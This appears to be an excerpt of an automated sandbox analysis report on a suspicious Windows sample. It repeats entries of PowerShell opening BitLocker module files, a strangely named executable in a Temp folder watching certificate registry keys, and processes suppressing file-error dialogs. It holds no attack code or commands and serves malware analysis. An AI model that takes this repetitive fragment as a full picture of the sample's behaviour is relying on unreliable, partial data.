Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
